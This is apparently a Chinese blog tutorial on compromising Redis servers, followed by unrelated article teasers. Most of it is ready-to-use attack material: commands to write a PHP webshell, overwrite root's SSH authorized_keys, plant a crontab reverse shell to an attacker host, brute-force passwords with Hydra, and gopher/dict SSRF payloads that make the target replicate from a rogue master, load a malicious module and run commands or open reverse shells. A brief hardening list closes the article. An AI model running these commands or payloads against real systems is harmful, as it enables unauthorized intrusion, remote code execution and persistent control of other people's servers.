Redis渗透SSRF的利用

Redis是什么?

Redis是NoSQL数据库之一,它使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库。默认端口是:6379

工具安装

下载地址:

http://download.redis.io/redis-stable.tar.gz

然后进行配置:

cd redis-stable 
make //全局生效 
cp src/redis-cli /usr/bin/

成功后
image.png

Redis常用的命令

redis-cli -h ip -p port -a pass // 连接redis数据库,如果无密码
info // 返回关于Redis 服务器的各种信息和统计数值
info persistence // 主要查看后台有没有运行任务
flushall										    # 删除所有键
keys *											    # 查询所有键,也可用配合正则查询指定键
get 键名											  # 查询数据
del	键名											  # 删除数据
exists 键名										  # 判断键是否存在

config set protected-mode no # 关闭安全模式

slaveof host port						 # 设置主节点
config set protected-mode no # 关闭安全模式
config set dir /tmp					 # 设置保存目录
config set dbfilename exp.so # 设置保存文件名
config get dir							 # 查看保存目录
config get dbfilename			   # 查看保存文件名
save											   # 执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。
slaveof no one  						 # 断开主节点	
module list 								 #redis4.x版本以上有模块功能,查询有什么模块
module load exp.so		 			 #加载exp.so文件模块
quit												 #退出

Redis未授权

漏洞原因在于,没有设置密码,攻击者直接连接Redis数据库,进行操作。

redis-cli -h xx.xx.xx.xx -p 6379

redis-cli 默认访问6379端口,可以看见不需要密码,也能执行info操作,说明存在未授权漏洞
image.png

Redis的攻击面

如果没有权限,就会遇到如图类似的这个,无权限。反之则返回OK
image.png

web目录下写webshell

info persistence //获取关于 Redis 持久性配置和状态的信息
config set dir /var/www/html  // 设置要配置的目录
config set dbfilename cike.php  //设置要配置的文件名
set shell "\n\n\n<?php phpinfo();?>\n\n\n"  //设置键名还有键的值
save //最后保存
  • 使用 \n 是为了在 Redis 中正确表示和保留换行符,以确保保存和读取时的一致性。
  • 当 rdb_bgsave_in_progress:0 为0时,save才能保存成功。除非权限不够。
  • rdb_bgsave_in_progress为1时,表示当前已经有一个后台保存操作正在进行中

image.png
最后可以看见 php文件,写入网站成功

替换公钥

攻击机上生成key,id_rsa.pub文件就是我们要替换的

ssh-keygen -t rsa

image.png
然后将公钥导入key.txt文件(前后用\n\n换行,避免和Redis里其他缓存数据混合)

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

image.png
这时候,我们将 key.txt 的公钥内容写入到目标主机的缓冲里:

cat key.txt| redis-cli -h xx.xx.xx.xx -x set ssh

image.png
连接目标主机的Redis,可以看见刚刚写入的ssh键值数据还在

get ssh  //查看ssh键名数据是否存在

image.png
然后执行以下命令:

config set dir /root/.ssh // 设置可写目录
config set dbfilename authorized_keys  //设置可写的键名
save //保存
keys * //查看存在的键名

image.png

通过crontab写反弹shell

连接redis后,使用以下命令

set cike "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/attack_ip/port 0>&1\n\n" //设置cike键名及值
config set dir /var/spool/cron // 使用centos的定时任务目录,ubuntu的为/var/spool/cron/crontabs目录
config set dbfilename shell //设置可写的文件名
save //保存

image.png
keys * 查看存在的键名,可以发现cike写入成功
image.png

使用Hydra爆破Redis密码

hydra -P passwd.txt redis://xx.xx.xx.xx

Redis主从复制导致RCE

漏洞原理

可以大概这样子理解,我们做主机,目标做从机。漏洞版本的范围是在 redis_version: 4.x-5.x之间
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以自定义新的的Redis命令,要通过写c语言并编译出.so文件才可以。
我们可以通过手法来上传so文件,这时候redis的module命令进行加载.so文件,就可以执行一些敏感命令。

远程主从复制

Redis运行远程服务器进行连接的时候,就叫做远程主从复制
使用以下工具:

https://github.com/n0b0dyCN/redis-rogue-server

利用方式:

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip

image.png
如果目标Redis服务开启了认证功能,可以添加 --passwd 参数

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip --passwd 123456

本地主从复制

当Redis数据库,只允许本地127.0.0.1进行连接,这时候就叫本地主从复制。

dict+ssrf(未授权)

dict协议通常用于探测端口毕竟方便,可以看见有回显
image.png
如果是http探测则会一直连接
image.png
通常使用dict协议爆破密码

?url=dict://0.0.0.0:6379/AUTH:root  //密码认证:root,可以利用这个爆破密码

可以看见返回了OK
image.png
如果是密码错误则如图
image.png
dict协议只能执行一条redis命令,通常用于未授权的redis操纵比较好

?url=dict://0.0.0.0:6379/SLAVEOF:107.149.212.113:15000 //连接我们的主机ip及设置的端口
?url=dict://0.0.0.0:6379/CONFIG:SET:dir:/tmp/
?url=dict://0.0.0.0:6379/config:set:dbfilename:exp.so  
?url=dict://0.0.0.0:6379/MODULE:LOAD:/tmp/exp.so  //加载exp.so
?url=dict://0.0.0.0:6379/slaveof:no:one  //断开主从
?url=dict://0.0.0.0:6379/system.exec:whoami //命令执行
?url=dict://0.0.0.0:6379/system.rev xx.xx.xx.xx 4444 //反弹shell

gopher+ssrf(密码认证)

gopher协议的优点是可以执行多行命令,可以一次性执行完要执行的命令。
空格二次编码后为%2520,换行符二次编码后为%250a;需要在每条命令后加上换行符

gopher://0.0.0.0:6379/_AUTH%2520(密码)%250a(执行的redis命令)%250aquit 

//执行不同的命令需要换行符加上%250a

主从复制的payload:

gopher://0.0.0.0:6379/_AUTH%2520root%250ainfo%250aquit //查看服务器信息,及进行密码root验证登录息,及进行密码root验证登录
gopher://0.0.0.0:6379/_AUTH%2520root%250aSLAVEOF xx.xx.xx.xx 1111%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aCONFIG SET dir /tmp/%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aconfig set dbfilename exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aMODULE LOAD /tmp/exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.exec whoami%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.rev xx.xx.xx.xx 4444%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aslaveof no one%250aquit

image.png
这里使用这个工具做个例子演示,配合上面的payload进行本地主从复制:

https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

攻击端:

python3 redis_rogue_server.py -v -path exp.so -lport 1111
// 开启主机以及端口,让redis连接这个主机,获取exp.so

image.png
这时候,我们在客户端输入之前的payload:gopher+ssrf,就可以利用了
关于其他的工具:

https://github.com/xmsec/redis-ssrf  //ssrf+gopher
https://github.com/firebroo/sec_tools //gopher 编码payload

防御

  • redis.conf的requirepass更改密码为强密码,防止未授权
  • redis.conf的port进行默认端口更改
  • 不以高权限用户运行redis,如root
  • protected-mode 设置开启保护模式

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/372339.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【Redis】字符串原理--简单动态字符串SDS

一.SDS定义 free 属性值为0&#xff0c;标识SDS没有分配任何未使用空间。len 属性值为5&#xff0c;标识SDS保存了一个5字节长度的字符串。buf 属性是一个char类型数组&#xff0c;数组的前5个字节保存了&#xff0c;R e d i s 五个字符&#xff0c;最后一个保存空字符串 \0…

网络原理TCP/IP(5)

文章目录 IP协议IP协议报头地址管理网段划分特殊的IP地址路由选择以太网认识MAC地址对比理解MAC地址和IP地址DNS&#xff08;域名服务器&#xff09; IP协议 IP协议主要完成的工作是两方面&#xff1a; 地址管理&#xff0c;使用一套地址体系&#xff0c;来描述互联网上每个设…

Springboot集成Camunda并完成一条流程实例

&#x1f496;专栏简介 ✔️本专栏将从Camunda(卡蒙达) 7中的关键概念到实现中国式工作流相关功能。 ✔️文章中只包含演示核心代码及测试数据&#xff0c;完整代码可查看作者的开源项目snail-camunda ✔️请给snail-camunda 点颗星吧&#x1f618; &#x1f496;设计流程定…

测试开发体系

软件测试 通过手工或者工具对 “被测对象”进行测试验证实际结果与预期结果之间是否存在差异 软件测试作用 通过测试工作可以发现并修复软件当中存在的缺陷&#xff0c;从而提高用户对产品的使用信心测试可以降低同类型产品开发遇到问题的风险 软件缺陷 软件缺陷被测试工程…

船舶维保管理:Java与SpringBoot的完美结合

✍✍计算机编程指导师 ⭐⭐个人介绍&#xff1a;自己非常喜欢研究技术问题&#xff01;专业做Java、Python、微信小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目&#xff1a;有源码或者技术上的问题欢迎在评论区一起讨论交流&#xff01; ⚡⚡ Java实战 |…

Linux openKylin(开放麒麟)系统SSH服务安装配置与公网远程连接

文章目录 前言1. 安装SSH服务2. 本地SSH连接测试3. openKylin安装Cpolar4. 配置 SSH公网地址5. 公网远程SSH连接6. 固定SSH公网地址7. SSH固定地址连接8. 结语 前言 openKylin是中国首个基于Linux 的桌面操作系统开发者平台&#xff0c;通过开放操作系统源代码的方式&#xff…

在工业制造方面,如何更好地实现数字化转型?

实现工业制造的数字化转型涉及利用数字技术来增强流程、提高效率并推动创新。以下是工业制造领域更好实现数字化转型的几个关键步骤&#xff1a; 1.定义明确的目标&#xff1a; 清楚地概述您的数字化转型目标。确定需要改进的领域&#xff0c;例如运营效率、产品质量或供应链…

【vue ezuikit-js】5分钟实现萤石视频放大对焦和缩小对焦

实现功能如上图:点击+按钮,实现画面放大并对焦;点击-,实现画面缩小并对焦。 官网上提供了电子放大的控制按钮和接口,但是只是把当前画面进行放大,并没有对焦,画面模糊。 萤石官方还提供了对焦的接口,根据传入的参数不同,可以实现放大对焦和缩小对焦。但是注意此接口是…

【Matplotlib】figure方法 你真的会了吗!?

&#x1f388;个人主页&#xff1a;甜美的江 &#x1f389;欢迎 &#x1f44d;点赞✍评论⭐收藏 &#x1f917;收录专栏&#xff1a;matplotlib &#x1f91d;希望本文对您有所裨益&#xff0c;如有不足之处&#xff0c;欢迎在评论区提出指正&#xff0c;让我们共同学习、交流进…

mysql项目实战,常用sql语句的实战笔记

1.使用sql语句对数据库进行创建 //创建实验用的数据库 CREATE DATABASE jsschool;//使用当前数据库 USE jsschool;//创建学生表 CREATE TABLE student (sno VARCHAR(20) PRIMARY KEY COMMENT 学生编号,sname VARCHAR(20) NOT NULL COMMENT 学生姓名,ssex VARCHAR(10) NOT NULL…

基于Java超市管理系统设计与实现(源码+部署文档)

博主介绍&#xff1a; ✌至今服务客户已经1000、专注于Java技术领域、项目定制、技术答疑、开发工具、毕业项目实战 ✌ &#x1f345; 文末获取源码联系 &#x1f345; &#x1f447;&#x1f3fb; 精彩专栏 推荐订阅 &#x1f447;&#x1f3fb; 不然下次找不到 Java项目精品实…

c++入门学习④——对象的初始化和清理

目录 对象的初始化和清理&#xff1a; why? 如何进行初始化和清理呢&#xff1f; 使用构造函数和析构函数​编辑 构造函数语法: 析构函数语法: 构造函数的分类&#xff1a; 两种分类方式&#xff1a; 三种调用方法&#xff1a; 括号法&#xff08;默认构造函数调用&…

sql非查询知识点(增删改-crud没有r)

1.建库 create database database_name 2.使用该数据库 use database_name 3.建表 3.1普通建表 create table if not exists actor(actor_id smallint(5) not null primary key comment "主键id",first_name varchar(45) not null comment "名字",last…

Python中的while循环,知其然知其所以然

文章目录 while循环结构1.用循环打印1 ~ 100步骤解析2. 1 ~ 100的累加和3.死循环1. 用死循环的方法实现 1 ~ 100累加和 4. 单向循环(1)打印 一行十个小星星*(2)通过打印一个变量的形式,展现一行十个小星星(3)一行十个换色的星星 ★☆★☆★☆★☆★☆(4)用一个循环,打印十行十列…

重写Sylar基于协程的服务器(7、TcpServer HttpServer的设计与实现)

重写Sylar基于协程的服务器&#xff08;7、TcpServer & HttpServer的设计与实现&#xff09; 重写Sylar基于协程的服务器系列&#xff1a; 重写Sylar基于协程的服务器&#xff08;0、搭建开发环境以及项目框架 || 下载编译简化版Sylar&#xff09; 重写Sylar基于协程的服务…

『运维备忘录』之 Vim 命令详解

运维人员不仅要熟悉操作系统、服务器、网络等只是&#xff0c;甚至对于开发相关的也要有所了解。很多运维工作者可能一时半会记不住那么多命令、代码、方法、原理或者用法等等。这里我将结合自身工作&#xff0c;持续给大家更新运维工作所需要接触到的知识点&#xff0c;希望大…

杨中科 ASP.NETCORE 高级14 SignalR

1、什么是websocket、SignalR 服务器向客户端发送数据 1、需求&#xff1a;Web聊天;站内沟通。 2、传统HTTP&#xff1a;只能客户端主动发送请求 3、传统方案&#xff1a;长轮询&#xff08;Long Polling&#xff09;。缺点是&#xff1f;&#xff08;1.客户端发送请求后&…

如何使用MCSM搭建我的世界Java版服务器并实现远程联机游戏

文章目录 1. 安装JAVA2. MCSManager安装3.局域网访问MCSM4.创建我的世界服务器5.局域网联机测试6.安装cpolar内网穿透7. 配置公网访问地址8.远程联机测试9. 配置固定远程联机端口地址9.1 保留一个固定tcp地址9.2 配置固定公网TCP地址9.3 使用固定公网地址远程联机 本教程主要介…

1802907-91-0,Methyltetrazine-PEG4-COOH,可以与多种不同的化学基团反应

您好&#xff0c;欢迎来到新研之家 文章关键词&#xff1a;Methyltetrazine-PEG4-COOH&#xff0c;Methyltetrazine-PEG4-acid&#xff0c;甲基四嗪-四聚乙二醇-羧基&#xff0c;甲基四嗪-四聚乙二醇-羧酸&#xff0c;甲基四嗪PEG4羧酸&#xff0c;甲基四嗪-PEG4-羧酸 一、基…

基于Java医院管理系统设计与实现(源码+部署文档)

博主介绍&#xff1a; ✌至今服务客户已经1000、专注于Java技术领域、项目定制、技术答疑、开发工具、毕业项目实战 ✌ &#x1f345; 文末获取源码联系 &#x1f345; &#x1f447;&#x1f3fb; 精彩专栏 推荐订阅 &#x1f447;&#x1f3fb; 不然下次找不到 Java项目精品实…